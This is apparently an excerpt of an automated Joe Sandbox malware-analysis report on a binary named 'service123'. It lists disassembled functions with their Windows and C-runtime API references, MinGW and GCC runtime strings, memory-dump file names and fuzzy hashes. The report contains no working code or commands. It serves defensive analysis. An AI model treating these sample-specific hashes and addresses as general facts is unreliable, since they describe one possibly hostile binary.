abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ec5dbba2125d857545973228bd0e5b2fc273fb647f7faff61b16683389a9ff3c
Instruction ID: 9c2d43f399bd1a07432f2e13ce2a36ab8f9ac9a81897628b0b24cc3fdd41fc7a
Opcode Fuzzy Hash: ec5dbba2125d857545973228bd0e5b2fc273fb647f7faff61b16683389a9ff3c
Instruction Fuzzy Hash: CCE0657194825F4BE710FF68D0843297BB16B8630CF94195CD95637943C375A46BCF41

Function 6C2FC0E0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C2FC151
fwrite.MSVCRT ref: 6C2FC1F8
fputs.MSVCRT ref: 6C2FC215
fwrite.MSVCRT ref: 6C2FC23E
fputs.MSVCRT ref: 6C2FC25D
fwrite.MSVCRT ref: 6C2FC28C
fwrite.MSVCRT ref: 6C2FC2BE
abort.MSVCRT ref: 6C2FC2C3
abort.MSVCRT ref: 6C3B6157
free.MSVCRT ref: 6C3B615F

Part of subcall function 6C2EA340: strlen.MSVCRT ref: 6C2EA3C5
Part of subcall function 6C2EA340: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C2FC1CC), ref: 6C2EA3E0
Part of subcall function 6C2EA340: free.MSVCRT ref: 6C2EA3EA

Strings

-, xrefs: 6C2FC271
not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 6C2FC0F9
terminate called after throwing an instance of ', xrefs: 6C2FC1F1
terminate called without an active exception, xrefs: 6C2FC285

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: fwrite$abortfputsfreememcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called without an active exception
API String ID: 4144276882-4175505668
Opcode ID: 525e2f1cc7225641bce665fa97a47c483bcc29ada6ac04826f848e87e0c87d39
Instruction ID: e53e7a55162de00ce4b153f9aca05b8caaa1335e543b7a98b45f7a83f0f8a008
Opcode Fuzzy Hash: 525e2f1cc7225641bce665fa97a47c483bcc29ada6ac04826f848e87e0c87d39
Instruction Fuzzy Hash: 885125B05483199FD700AF68C48879EFBF4AF85308F00891DE8A997B41DB759489DF93

Function 6C2ED8A8 Relevance: 24.1, APIs: 16, Instructions: 52COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 655433b4d4ee4e3407e8f4a73c2d04d1bdeaeff069cbf8d4a39f90913c809343
Instruction ID: 124b01930c41d707cff3b8eefb1974126ca1fe13d65053d1d2dd20aff07875a4
Opcode Fuzzy Hash: 655433b4d4ee4e3407e8f4a73c2d04d1bdeaeff069cbf8d4a39f90913c809343
Instruction Fuzzy Hash: 6DF089B09A534E4FD310DF288481765BBB47B87315F881C48DC442BB43C33594A9CF91

Function 6C2EDE50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

@, xrefs: 6C2EDEB8

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: c5f2fafaf39a9a38c73e5b1a803ee70f982ea760bd6255816a6332e4f0322aaf
Instruction ID: a3dbb6c16cbac032c5f9043df8f761e00dd617bd4f6cac0a7d651b7326d4e6a2
Opcode Fuzzy Hash: c5f2fafaf39a9a38c73e5b1a803ee70f982ea760bd6255816a6332e4f0322aaf
Instruction Fuzzy Hash: A921C371A0025E8BDB10DF64CC84BDDB7B8ABCA319F5445A6DD18BB601E7309A888F80

Function 6C2EDA90 Relevance: 22.6, APIs: 15, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 5d232d9f92e9ea7b157d8726abe0eeea2850486588da9372e18f3035534a573c
Instruction ID: 3e9fbc2dd909ace3d69cda204b45871a9b217e54acbb5de85459f02728675f7f
Opcode Fuzzy Hash: 5d232d9f92e9ea7b157d8726abe0eeea2850486588da9372e18f3035534a573c
Instruction Fuzzy Hash: DF412C75A0421D9BCB10DF64C880BDEB7B1AF89318F5489A9DC59B7701D730AE89CF90

Function 6C2EDCE0 Relevance: 21.1, APIs: 14, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction ID: c3893a1904f9044e9e8ed4a950071b36e16686045cbbf6e19f1bc2525c3e212a
Opcode Fuzzy Hash: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction Fuzzy Hash: 1711197594021C9BCB14EF64C8809DEB7B5AF8A358F448968EC0977B01DB30AE99CFD0

Function 6C2EDD80 Relevance: 19.6, APIs: 13, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 969a6e84ef485a6d0f87a3e346e8a8000e5877b16e4c634416c9ff8726bfa541
Instruction ID: 9aa15184dc45dc4157d5d177c99212261d9e662d1a5fd37cb84bab303e650d3e
Opcode Fuzzy Hash: 969a6e84ef485a6d0f87a3e346e8a8000e5877b16e4c634416c9ff8726bfa541
Instruction Fuzzy Hash: 6E21D874A0421E9BCF14DF60C8809DEB7B5AB89358F5488A8DD0977741D730AE8ACF90

Function 6C2F0310 Relevance: 18.2, APIs: 12, Instructions: 165COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3B370F), ref: 6C2F034B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3B370F), ref: 6C2F0352
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C3B370F), ref: 6C2F0360

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: b5470ea9a38fc2fe6fdbfb87446201d10c2e94920a4d19de35b85eeb566e7dce
Instruction ID: 9d790e482e72a67d12110a81d0ae8035040951b87b9fefda45a491b8b900fb04
Opcode Fuzzy Hash: b5470ea9a38fc2fe6fdbfb87446201d10c2e94920a4d19de35b85eeb566e7dce
Instruction Fuzzy Hash: 27516E7078934E8FCB00EF29C584A5AB7F5BB86304F15462CECA887714E771E846CB92

Function 6C2EA690 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6C2EA6BF
vfprintf.MSVCRT ref: 6C2EA6DF
abort.MSVCRT ref: 6C2EA6E4
VirtualQuery.KERNEL32 ref: 6C2EA77B

Strings

Address %p has no image-section, xrefs: 6C2EA83B
VirtualQuery failed for %d bytes at address %p, xrefs: 6C2EA827
VirtualProtect failed with code 0x%x, xrefs: 6C2EA7F6
Mingw-w64 runtime failure:, xrefs: 6C2EA6B8

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: c6e1620f568d4c1e8387424368573e5f76cb9be9f10cdd6cbc1aedc53e1a170d
Instruction ID: d36230167c205814a94a5749d948c88cc621f4565c2eb1acea1c8a3c48733b0e
Opcode Fuzzy Hash: c6e1620f568d4c1e8387424368573e5f76cb9be9f10cdd6cbc1aedc53e1a170d
Instruction Fuzzy Hash: F7515BB1A48305DBCB00EF29C58465AFBF0FF89318F958A1DE89897650D730E849CB92

Function 002D1940 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 002D196F
vfprintf.MSVCRT ref: 002D198F
abort.MSVCRT ref: 002D1994
VirtualQuery.KERNEL32 ref: 002D1A2B

Strings

Mingw-w64 runtime failure:, xrefs: 002D1968
VirtualQuery failed for %d bytes at address %p, xrefs: 002D1AD7
Address %p has no image-section, xrefs: 002D1AEB
VirtualProtect failed with code 0x%x, xrefs: 002D1AA6

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 9e80da2c32d20d2a9958bc635b77e91cb339829dfc16a2911cb54b7c0b4e0e96
Instruction ID: af409455f2923b1b35649931580749c999d2e9294c315ced07271688f9e73cbb
Opcode Fuzzy Hash: 9e80da2c32d20d2a9958bc635b77e91cb339829dfc16a2911cb54b7c0b4e0e96
Instruction Fuzzy Hash: 685189B1919701AFC700EF68E88965AFBE0FF84354F45891EE8888B311D734EC65CB92

Function 6C2EE0A0 Relevance: 16.6, APIs: 11, Instructions: 98COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: d6a75d25b671d4975ccaf13fde70f9ddf17dad593d0507541edfb45a35fd80ca
Instruction ID: 1649f24b96ca7b15705d83138455bba14b0b09a2972bde0160481a46ea69dec2
Opcode Fuzzy Hash: d6a75d25b671d4975ccaf13fde70f9ddf17dad593d0507541edfb45a35fd80ca
Instruction Fuzzy Hash: 7E213B3234520D8BC704CF1CD88199673A6EBCA32876C817EE8489BB15D637A847C790

Function 6C2EE570 Relevance: 15.1, APIs: 10, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction ID: d344f3f21041d90531fb435f7c2138ba409429a34330e896c2e70c69a725c19e
Opcode Fuzzy Hash: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction Fuzzy Hash: 4641C47050830B8BD710DF29C04076AB7E1AF99319F944E19FCA4A7A99E734D94ECBD2

Function 6C2EE59B Relevance: 15.1, APIs: 10, Instructions: 89COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction ID: 52503e95c20f961b2be56fd6cbc939889faf2ca829ddc1dc262fe39e537efe24
Opcode Fuzzy Hash: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction Fuzzy Hash: A421B77050530B4BDB10DE25C0506AAB7E1AF49319FE44E19FCB4A7A49E330D94ACBD2

Function 6C2EE714 Relevance: 15.0, APIs: 10, Instructions: 35COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
